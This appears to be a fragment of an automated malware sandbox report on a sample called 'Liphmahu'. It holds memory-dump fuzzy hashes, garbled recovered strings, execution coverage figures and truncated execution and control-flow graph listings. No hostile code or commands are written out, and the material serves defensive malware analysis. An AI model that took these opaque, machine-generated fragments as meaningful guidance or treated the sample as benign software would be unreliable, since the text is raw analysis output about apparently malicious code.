                                                                                  • Opcode ID: 66321e64e507afe2b49e7ec93ee31bf7f31de3938d4abc984d69f0acf81b3a76
                                                                                  • Instruction ID: c773a7a8f6cf085cb776d64da35335513ccd45b5c34446157dc64b3bf7d8c55d
                                                                                  • Opcode Fuzzy Hash: 66321e64e507afe2b49e7ec93ee31bf7f31de3938d4abc984d69f0acf81b3a76
                                                                                  • Instruction Fuzzy Hash: B4E0C235D08108EBC744EF94E9419ACBBB8EB49300F10D1DDD80913390CA315E42CF80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d5ca283afe0c6bd2361c91899840b3a7755a8e076c3bdd494061c3f9fbfbf37f
                                                                                  • Instruction ID: 954f49a445b6401079ef4e4b0933af3c850d36affd061a6eb2fc973e6aaa24be
                                                                                  • Opcode Fuzzy Hash: d5ca283afe0c6bd2361c91899840b3a7755a8e076c3bdd494061c3f9fbfbf37f
                                                                                  • Instruction Fuzzy Hash: F9E0C27188110CDBC7C0FFF4A90469E77E8DB05200F8045A9D50093110ED714A159BA2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 13c5955db16302a2d7bc078356c90d67328ad11280929495753fdcfd9072f22d
                                                                                  • Instruction ID: e3aa3821eb79d61d2dca18c6192651edcbf59edef3d471607141477837060697
                                                                                  • Opcode Fuzzy Hash: 13c5955db16302a2d7bc078356c90d67328ad11280929495753fdcfd9072f22d
                                                                                  • Instruction Fuzzy Hash: 99E065B0A58018CFD368EBA4C8587AD7BB6FB84308F1040A9B50AA7381DF305E458F45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 75dde73abaa0b80181d5fb4b80d7511b1f6de15ec1c62e545cea2bef2a16c52e
                                                                                  • Instruction ID: fc95eb799de0b8cfac195f7f30bd458eb7f3d16b3fee265ed66f815f8d481323
                                                                                  • Opcode Fuzzy Hash: 75dde73abaa0b80181d5fb4b80d7511b1f6de15ec1c62e545cea2bef2a16c52e
                                                                                  • Instruction Fuzzy Hash: EAE0EC74D89248DFCB40DFA8EA4969CBBF5AB08201F1090AA9849A3250EA705A54CF41
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c9f0eb58e2e8b5f64fec5ca075cd4c2b0f4397c34f8073de88aff441a103c713
                                                                                  • Instruction ID: 9acef63b6810eaf7329b277292e9d1c012a5750e35766b26bfe8d92c4d537010
                                                                                  • Opcode Fuzzy Hash: c9f0eb58e2e8b5f64fec5ca075cd4c2b0f4397c34f8073de88aff441a103c713
                                                                                  • Instruction Fuzzy Hash: AFE0C27188110CDFC780FFF49908A9D7BE8DB05200F8055B9950193150ED718A119B96
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 441a6ea9ada388783df92c1df11ba6be4ca79b89f592e3dfe93c34ee9f093103
                                                                                  • Instruction ID: 5042110a834d5a25474eabcca76492f1aa55c300a7237c91daa2f242fae385cb
                                                                                  • Opcode Fuzzy Hash: 441a6ea9ada388783df92c1df11ba6be4ca79b89f592e3dfe93c34ee9f093103
                                                                                  • Instruction Fuzzy Hash: 3BE01A70A44258CFDB24DF20D888BDDBBB2FB08311F614186944DA3204DB309E81CF01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0e99b63e46dc65c5f6d864d452c5071f043836918b41a727af867744f9eb7d32
                                                                                  • Instruction ID: b8ca9f78b4eb91f5761f3e68ecbb6c2281fce36e42ce674ed8653ab095f5782e
                                                                                  • Opcode Fuzzy Hash: 0e99b63e46dc65c5f6d864d452c5071f043836918b41a727af867744f9eb7d32
                                                                                  • Instruction Fuzzy Hash: 2EE0E574A48648DFEB44EF88E088BAD7FF2FB14714F91002AE005AB344D7709985CF05
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fcc6c996bd120c193b83b97af3e8395f111f477c4f178c8a6fe227fb0f17dc89
                                                                                  • Instruction ID: 803d36c88231d0b6113e9df92dab6f13812e69fe968554187ea8088a6eaa68c2
                                                                                  • Opcode Fuzzy Hash: fcc6c996bd120c193b83b97af3e8395f111f477c4f178c8a6fe227fb0f17dc89
                                                                                  • Instruction Fuzzy Hash: ADE05B34A0020DEFCB00EFB8D95169DB7F5EB44314F5041A9D808D3705DA316F499B91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4d3d2d8693e9a2aaf961e41963e386c22c2d17b6219a553a0a938abcc74c1c85
                                                                                  • Instruction ID: 801422e46f0df0d2043234d386bd5f8a16826c51cfef2b7f886598eb6c5c9f52
                                                                                  • Opcode Fuzzy Hash: 4d3d2d8693e9a2aaf961e41963e386c22c2d17b6219a553a0a938abcc74c1c85
                                                                                  • Instruction Fuzzy Hash: 75E0E534A041189FD790EF64D898BDDBBB2EF59311F508099A589AB344CF705EC5CF45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bba1d0ca98bc049b136dd81240a5b3c75453dc413c7bc7a7142d88c270ffaf22
                                                                                  • Instruction ID: 87b1c0024838920ebbc16609608f2a25a844ee9416899343f275b1d1566ab7e4
                                                                                  • Opcode Fuzzy Hash: bba1d0ca98bc049b136dd81240a5b3c75453dc413c7bc7a7142d88c270ffaf22
                                                                                  • Instruction Fuzzy Hash: DAE01AB4A04118DFD714EFA4D9846DCBBB2EF55301F504199A949BB351DB706EC5CF01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e79c06b2b9c8d2e61f3b3ca28078618764baa575eb673eb95844591af7222424
                                                                                  • Instruction ID: e7fa0855700495191deeaef57646560d3410ff0d8f916f4b1607bb5e901ca84c
                                                                                  • Opcode Fuzzy Hash: e79c06b2b9c8d2e61f3b3ca28078618764baa575eb673eb95844591af7222424
                                                                                  • Instruction Fuzzy Hash: 8FE01A34A442188FC7A4EF64D89479CBBB3FB48300F508099A50ABB390DB306E89CF02
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bb98757237adcc566f556d195426926bfd5df24e4edf34d40a1dbb596524de62
                                                                                  • Instruction ID: cb18d324019ffcff37ea887b7724c12a12a55a00e4e352910704c03e86b4338e
                                                                                  • Opcode Fuzzy Hash: bb98757237adcc566f556d195426926bfd5df24e4edf34d40a1dbb596524de62
                                                                                  • Instruction Fuzzy Hash: 40E09A30A44209CFD764EF64C8507EC7BB2EB44302F5081A9A21EB7340EB301E89CF01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b9d5733e66927711007af2016ab880df7bce1d1fa984603a46cd06c4db2616c2
                                                                                  • Instruction ID: e4e18358b93be8d3a64eae343fd404b75100721836a8d790f403ba577b06ca81
                                                                                  • Opcode Fuzzy Hash: b9d5733e66927711007af2016ab880df7bce1d1fa984603a46cd06c4db2616c2
                                                                                  • Instruction Fuzzy Hash: B3E01A70A40658CFD714EFA4D854B9D7BB2FB89306F10809A950ABB384DB306E84CF61
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8b1cdaa35755bde7f1c232cce2e1483ad931c27f45c41c1f8fe5d54c9e48b2a0
                                                                                  • Instruction ID: dba36db0714428de416e978b0b5bf416e8acf72a0ff9140c5785e2c88cf2ccdd
                                                                                  • Opcode Fuzzy Hash: 8b1cdaa35755bde7f1c232cce2e1483ad931c27f45c41c1f8fe5d54c9e48b2a0
                                                                                  • Instruction Fuzzy Hash: 43E01A30A40318DFD754EF54EC44B9E7BB2EB86301F214098910AB7345DB315E80CF12
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d7f86191dab32fa051ca1534426d16ca2e871ea607dd1da6e88abc9735e39034
                                                                                  • Instruction ID: 321d0c5e43593508517f6aef5fbadbbdd5d133829c6d889153d336a4390560cb
                                                                                  • Opcode Fuzzy Hash: d7f86191dab32fa051ca1534426d16ca2e871ea607dd1da6e88abc9735e39034
                                                                                  • Instruction Fuzzy Hash: 52D012761502589FC700CB64D845F457B76EB192A5F2980A5F9088B332C622F824D798
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1e80eebf3b179f9e7137f6c507aae6fa0b536288f8c7794bb1fade2c1e694fd7
                                                                                  • Instruction ID: b9c020ec59cffc09fa9c94717709a00f27987312b8ae53f2bdccecc0cfae1dce
                                                                                  • Opcode Fuzzy Hash: 1e80eebf3b179f9e7137f6c507aae6fa0b536288f8c7794bb1fade2c1e694fd7
                                                                                  • Instruction Fuzzy Hash: 0DD01770A803188FDB10EB25C804AA97EF2FB41300F10829AC446AB348DB308A848F81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b13d4a1bb0493d70dd662bddcb9865fff18db8d84159bede81453e7c8d8fccd2
                                                                                  • Instruction ID: b9c020ec59cffc09fa9c94717709a00f27987312b8ae53f2bdccecc0cfae1dce
                                                                                  • Opcode Fuzzy Hash: b13d4a1bb0493d70dd662bddcb9865fff18db8d84159bede81453e7c8d8fccd2
                                                                                  • Instruction Fuzzy Hash: 0DD01770A803188FDB10EB25C804AA97EF2FB41300F10829AC446AB348DB308A848F81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 874512c63f5911652bbef3c4a551a28699d349b3ad52a0342bbbe38d90524c9f
                                                                                  • Instruction ID: 3c36a049c6bd6d1f7f20eefa9022863f1796af525a6fa06f7a464a1025cd21df
                                                                                  • Opcode Fuzzy Hash: 874512c63f5911652bbef3c4a551a28699d349b3ad52a0342bbbe38d90524c9f
                                                                                  • Instruction Fuzzy Hash: 22D06C70A0A358DFDB11EF24ED88A9E7BB2EB66304F11408A9049A7256C6359E858F16
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 337f932998baf58d3f8e9db71f8b19d30adaea3ca4fbf92adfcce8ce5e4d4287
                                                                                  • Instruction ID: 9b4f1b30d716e8d81f33bbab0dcfe7d3b506370aa0373a36d90f05511c428f6c
                                                                                  • Opcode Fuzzy Hash: 337f932998baf58d3f8e9db71f8b19d30adaea3ca4fbf92adfcce8ce5e4d4287
                                                                                  • Instruction Fuzzy Hash: 02D0C9B26542089FC300DB64D8149457B69AB65655B1640A6E9046B2B2E637D4109A54
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e62d932eb1b5c584ee1ae5556affdc6fd341d40b7e71175ca7670cb549c1b41e
                                                                                  • Instruction ID: 1e7c51184d3f40c89deb2e145e67e54067cfd880609d60b738540784ad5f8912
                                                                                  • Opcode Fuzzy Hash: e62d932eb1b5c584ee1ae5556affdc6fd341d40b7e71175ca7670cb549c1b41e
                                                                                  • Instruction Fuzzy Hash: 8AC012310086118FCB28EB28F544C86B7A6EF4030030189AAE00A8B325CB70EC85CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 05947b75d8097f715adeb53994b890473e504b0e4a4b10c4a988a9b67706ad58
                                                                                  • Instruction ID: 44276d0c86607e67c667245f934f9744348b59b95f54a432c6005a7181ed30f1
                                                                                  • Opcode Fuzzy Hash: 05947b75d8097f715adeb53994b890473e504b0e4a4b10c4a988a9b67706ad58
                                                                                  • Instruction Fuzzy Hash: 52D0123714A2C59FC706CB34E8648947F31FF6A20570C8097E085C7172CA229456DB54
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fac1b1d7f98601ec301a47fd2dc9e9c73f250e9fdf80b8e5f2e1e163db39775f
                                                                                  • Instruction ID: 5cdaa41959927eb75a585edae02e0338bd35399d34ae5533611ac88a282029b4
                                                                                  • Opcode Fuzzy Hash: fac1b1d7f98601ec301a47fd2dc9e9c73f250e9fdf80b8e5f2e1e163db39775f
                                                                                  • Instruction Fuzzy Hash: 3EC012712082845FCB02CE18CD28C05BF71EB96204B09C0ABA844CA2A2F6268C06F711
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e8615816863812d15e042572bfc5bb171aefea573100f63de4882c33dfb4b2d4
                                                                                  • Instruction ID: 80ec9f22d2c3b6c17bd99047b0c385f8f4248c00fa92c07fb40c075a0fc2f481
                                                                                  • Opcode Fuzzy Hash: e8615816863812d15e042572bfc5bb171aefea573100f63de4882c33dfb4b2d4
                                                                                  • Instruction Fuzzy Hash: 05C04C76E1011E9BCF00DBD9E4409DCFB74EF94321F404036D214A7104D6305526DF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d3a3cfc504cd3c31ebcc0f76673a0b037e7b573997e113929ad4c9eb3b750390
                                                                                  • Instruction ID: 6943f95d5942926b4cbccdafff06cabc1cc0c4310696933d72577c4fccd7f17f
                                                                                  • Opcode Fuzzy Hash: d3a3cfc504cd3c31ebcc0f76673a0b037e7b573997e113929ad4c9eb3b750390
                                                                                  • Instruction Fuzzy Hash: CCD09230A90A19CFDB10EB14DD48B9ABBB1BB05305F0091A5C049A2255D6705E848F00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                  • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                                  • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                  • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 973626fe39186c9fed9e8ce7f288fcbd6588a2e6dc1da52f4d730579d28f9f52
                                                                                  • Instruction ID: fbefe7ab718257c30524c22448147910e2e6ae0152596a1ae499272d6abbf8b6
                                                                                  • Opcode Fuzzy Hash: 973626fe39186c9fed9e8ce7f288fcbd6588a2e6dc1da52f4d730579d28f9f52
                                                                                  • Instruction Fuzzy Hash: F3D0CAB8E02328CFCB20CF24D985B88BBB2BF46300F0044DA9699A2201DB704E80CF02
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7ee210cba2e6d7cc4524526e86c93d4ff05fa25d5bf529a9e2d9bbf6fba4ca14
                                                                                  • Instruction ID: f85fd16ab0a7fd8941fc35b031f43f8ed77201688f9391ed524c187132c354f1
                                                                                  • Opcode Fuzzy Hash: 7ee210cba2e6d7cc4524526e86c93d4ff05fa25d5bf529a9e2d9bbf6fba4ca14
                                                                                  • Instruction Fuzzy Hash: 27C08C301481088BF340EBA4C4182AC3AA3E768B04F40C00AD0427B2C4CA748A068F24
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3a3ac74fc298218ccaa70aaad394fdc026ac11c119e654f163ee9b9bc33d5379
                                                                                  • Instruction ID: fb0c7195d362bed6af3b964b0ff3667b819cd08e40caa3ea853de09e0cf38f9b
                                                                                  • Opcode Fuzzy Hash: 3a3ac74fc298218ccaa70aaad394fdc026ac11c119e654f163ee9b9bc33d5379
                                                                                  • Instruction Fuzzy Hash: 67B09232040209AB8B019B84E804859BF69BB58704B048026A609062218B32A822DAD8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e30dce91f2ffab53f6f499cc5d8a490cc2932782713aab253fcad2918a86c580
                                                                                  • Instruction ID: 0160c7151d326af79bcb440949ee3d3bee4de2c3e96d4ee4c79b64bac9791f17
                                                                                  • Opcode Fuzzy Hash: e30dce91f2ffab53f6f499cc5d8a490cc2932782713aab253fcad2918a86c580
                                                                                  • Instruction Fuzzy Hash: C9A0027629524693DA503160ED97B454104DBA0554FE68A67DE107D190D48F70863635
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (oq$4'kq$4'kq$4'kq$4'kq$poq
                                                                                  • API String ID: 0-755401861
                                                                                  • Opcode ID: 0aec547355da3d227113a1b27031927b8092162b6187258794f0308abc99d923
                                                                                  • Instruction ID: 0ae75b91425222735eca7fdc3b9983669188d38929ebfe005619f39a26d74943
                                                                                  • Opcode Fuzzy Hash: 0aec547355da3d227113a1b27031927b8092162b6187258794f0308abc99d923
                                                                                  • Instruction Fuzzy Hash: 71518130A402099FCB14EB6D89506AFBBEBFFC8300F54886DC445973A9DB35E9468791
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (_kq$(_kq$(_kq$(_kq
                                                                                  • API String ID: 0-3111510350
                                                                                  • Opcode ID: d391828d50526591e9d036b1dac25b0559c96cc2590144cb7fb4bb4970031219
                                                                                  • Instruction ID: c40a5fad72b01ee72cec9a73adcceebf79ec68fb391d80dd827a23c254f5e55d
                                                                                  • Opcode Fuzzy Hash: d391828d50526591e9d036b1dac25b0559c96cc2590144cb7fb4bb4970031219
                                                                                  • Instruction Fuzzy Hash: 3461BF79B00605CFCB04DF68C49596EBBB6FF89310B64456AE406DB3A5EB31EC42CB91

                                                                                  Execution Graph

                                                                                  Execution Coverage:11.7%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:17
                                                                                  Total number of Limit Nodes:4
                                                                                  execution_graph 24430 1290848 24431 129084e 24430->24431 24432 129091b 24431->24432 24434 1291382 24431->24434 24436 129138b 24434->24436 24435 1291480 24435->24431 24436->24435 24438 1297ea8 24436->24438 24439 1297eb2 24438->24439 24440 1297ecc 24439->24440 24443 6b3faa9 24439->24443 24447 6b3fab8 24439->24447 24440->24436 24444 6b3facd 24443->24444 24445 6b3fce2 24444->24445 24446 6b3fcf7 GlobalMemoryStatusEx 24444->24446 24445->24440 24446->24444 24449 6b3facd 24447->24449 24448 6b3fce2 24448->24440 24449->24448 24450 6b3fcf7 GlobalMemoryStatusEx 24449->24450 24450->24449

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 131 6b33100-6b33121 132 6b33123-6b33126 131->132 133 6b33128-6b33147 132->133 134 6b3314c-6b3314f 132->134 133->134 135 6b338f0-6b338f2 134->135 136 6b33155-6b33174 134->136 137 6b338f4 135->137 138 6b338f9-6b338fc 135->138 144 6b33176-6b33179 136->144 145 6b3318d-6b33197 136->145 137->138 138->132 141 6b33902-6b3390b 138->141 144->145 146 6b3317b-6b3318b 144->146 149 6b3319d-6b331ac 145->149 146->149 257 6b331ae call 6b33920 149->257 258 6b331ae call 6b33918 149->258 150 6b331b3-6b331b8 151 6b331c5-6b334a2 150->151 152 6b331ba-6b331c0 150->152 173 6b338e2-6b338ef 151->173 174 6b334a8-6b33557 151->174 152->141 183 6b33580 174->183 184 6b33559-6b3357e 174->184 185 6b33589-6b3359c 183->185 184->185 188 6b335a2-6b335c4 185->188 189 6b338c9-6b338d5 185->189 188->189 192 6b335ca-6b335d4 188->192 189->174 190 6b338db 189->190 190->173 192->189 193 6b335da-6b335e5 192->193 193->189 194 6b335eb-6b336c1 193->194 206 6b336c3-6b336c5 194->206 207 6b336cf-6b336ff 194->207 206->207 211 6b33701-6b33703 207->211 212 6b3370d-6b33719 207->212 211->212 213 6b3371b-6b3371f 212->213 214 6b33779-6b3377d 212->214 213->214 217 6b33721-6b3374b 213->217 215 6b33783-6b337bf 214->215 216 6b338ba-6b338c3 214->216 227 6b337c1-6b337c3 215->227 228 6b337cd-6b337db 215->228 216->189 216->194 224 6b33759-6b33776 217->224 225 6b3374d-6b3374f 217->225 224->214 225->224 227->228 231 6b337f2-6b337fd 228->231 232 6b337dd-6b337e8 228->232 235 6b33815-6b33826 231->235 236 6b337ff-6b33805 231->236 232->231 237 6b337ea 232->237 241 6b33828-6b3382e 235->241 242 